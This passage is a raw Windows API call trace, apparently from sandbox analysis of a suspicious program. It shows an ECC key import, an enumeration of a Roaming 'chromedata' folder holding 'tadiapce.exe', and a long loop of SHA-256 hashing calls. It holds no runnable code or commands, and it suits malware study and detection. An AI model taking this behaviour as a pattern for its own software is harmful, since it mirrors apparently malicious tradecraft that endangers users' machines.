	[0102.045] NCryptImportKey (in: hProvider=0x234f30, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", pParameterList=0x0, phKey=0x1294ec, pbData=0x248968, cbData=0x68, dwFlags=0x0 | out: phKey=0x1294ec) returned 0x0
	[0102.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x211118
	[0102.053] NCryptDeleteKey (hKey=0x2486e8, dwFlags=0x0) returned 0x0
	[0102.054] NCryptFreeObject (hObject=0x234f30) returned 0x0
	[0102.054] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x248968) returned 1
	[0102.054] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\\\*", lpFindFileData=0x12929c | out: lpFindFileData=0x12929c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x78fd700, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x260ab240, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x260ab240, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d0000, dwReserved1=0x8, cFileName=".", cAlternateFileName="")) returned 0x213ab0
	[0102.054] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x12929c | out: lpFindFileData=0x12929c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x78fd700, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x260ab240, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x260ab240, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d0000, dwReserved1=0x8, cFileName="..", cAlternateFileName="")) returned 1
	[0102.054] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x12929c | out: lpFindFileData=0x12929c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x260ab240, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x260ab240, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d0000, dwReserved1=0x8, cFileName="Data", cAlternateFileName="")) returned 1
	[0102.054] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x12929c | out: lpFindFileData=0x12929c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x78fd700, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x78fd700, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x71541c00, ftLastWriteTime.dwHighDateTime=0x1d50bc8, nFileSizeHigh=0x0, nFileSizeLow=0x3e800, dwReserved0=0x1d0000, dwReserved1=0x8, cFileName="tadiapce.exe", cAlternateFileName="")) returned 1
	[0102.054] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x12929c | out: lpFindFileData=0x12929c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x78fd700, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x78fd700, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x71541c00, ftLastWriteTime.dwHighDateTime=0x1d50bc8, nFileSizeHigh=0x0, nFileSizeLow=0x3e800, dwReserved0=0x1d0000, dwReserved1=0x8, cFileName="tadiapce.exe", cAlternateFileName="")) returned 0
	[0102.054] FindClose (in: hFindFile=0x213ab0 | out: hFindFile=0x213ab0) returned 1
	[0102.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f050
	[0102.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x780) returned 0x244200
	[0102.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x244988
	[0102.054] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.055] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.055] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0102.055] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f078
	[0102.055] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x23f078, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f078, pdwDataLen=0x12941c) returned 1
	[0102.055] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.055] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.055] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.055] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.055] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0102.055] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f0a0
	[0102.055] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x23f0a0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f0a0, pdwDataLen=0x12941c) returned 1
	[0102.055] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.055] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.055] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.056] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.056] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0102.056] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f0c8
	[0102.056] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x23f0c8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f0c8, pdwDataLen=0x12941c) returned 1
	[0102.056] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.056] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.056] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.056] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.056] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0102.056] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f0f0
	[0102.056] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x23f0f0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f0f0, pdwDataLen=0x12941c) returned 1
	[0102.056] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.056] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.056] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.057] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.057] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0102.057] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f118
	[0102.057] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x23f118, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f118, pdwDataLen=0x12941c) returned 1
	[0102.057] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.057] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.057] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.057] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.057] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0102.057] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f140
	[0102.057] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x23f140, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f140, pdwDataLen=0x12941c) returned 1
	[0102.057] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.057] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.057] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.058] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.058] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0102.058] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f168
	[0102.058] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x23f168, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f168, pdwDataLen=0x12941c) returned 1
	[0102.058] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.058] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.058] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.058] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.058] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0102.058] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f190
	[0102.058] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x23f190, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f190, pdwDataLen=0x12941c) returned 1
	[0102.058] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.058] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.058] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.059] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.059] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0102.059] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f1b8
	[0102.059] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x23f1b8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f1b8, pdwDataLen=0x12941c) returned 1
	[0102.059] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.059] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.059] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.059] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.059] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0102.059] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f1e0
	[0102.059] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x23f1e0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f1e0, pdwDataLen=0x12941c) returned 1
	[0102.059] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.059] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.059] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.060] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.060] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0102.060] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23f208
	[0102.060] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x23f208, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x23f208, pdwDataLen=0x12941c) returned 1
	[0102.060] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.060] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.060] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.060] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.060] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0102.060] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x211c80
	[0102.060] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x211c80, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x211c80, pdwDataLen=0x12941c) returned 1
	[0102.060] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.060] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.060] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.061] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.061] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0102.061] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2459a8
	[0102.061] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2459a8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2459a8, pdwDataLen=0x12941c) returned 1
	[0102.061] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.061] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.061] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.061] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.061] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0102.061] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2459d0
	[0102.061] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2459d0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2459d0, pdwDataLen=0x12941c) returned 1
	[0102.061] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.061] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.061] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.062] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.062] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0102.062] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2459f8
	[0102.062] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2459f8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2459f8, pdwDataLen=0x12941c) returned 1
	[0102.062] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.062] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.062] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.062] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.062] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0102.062] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245a20
	[0102.062] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245a20, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245a20, pdwDataLen=0x12941c) returned 1
	[0102.062] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.062] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.062] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.063] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.063] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0102.063] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245a48
	[0102.063] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245a48, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245a48, pdwDataLen=0x12941c) returned 1
	[0102.063] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.063] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.063] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.063] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.063] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0102.063] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245a70
	[0102.063] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245a70, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245a70, pdwDataLen=0x12941c) returned 1
	[0102.063] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.063] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.063] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.064] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.064] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0102.064] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245a98
	[0102.064] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245a98, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245a98, pdwDataLen=0x12941c) returned 1
	[0102.064] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.064] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.064] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.064] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.064] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0102.064] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245ac0
	[0102.064] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245ac0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245ac0, pdwDataLen=0x12941c) returned 1
	[0102.064] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.064] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.064] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.065] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.065] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0102.065] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245ae8
	[0102.065] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x245ae8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245ae8, pdwDataLen=0x12941c) returned 1
	[0102.065] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.065] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.065] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.065] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.065] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0102.065] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x245b10
	[0102.065] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x245b10, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x245b10, pdwDataLen=0x12941c) returned 1
	[0102.065] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.065] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.065] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.065] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
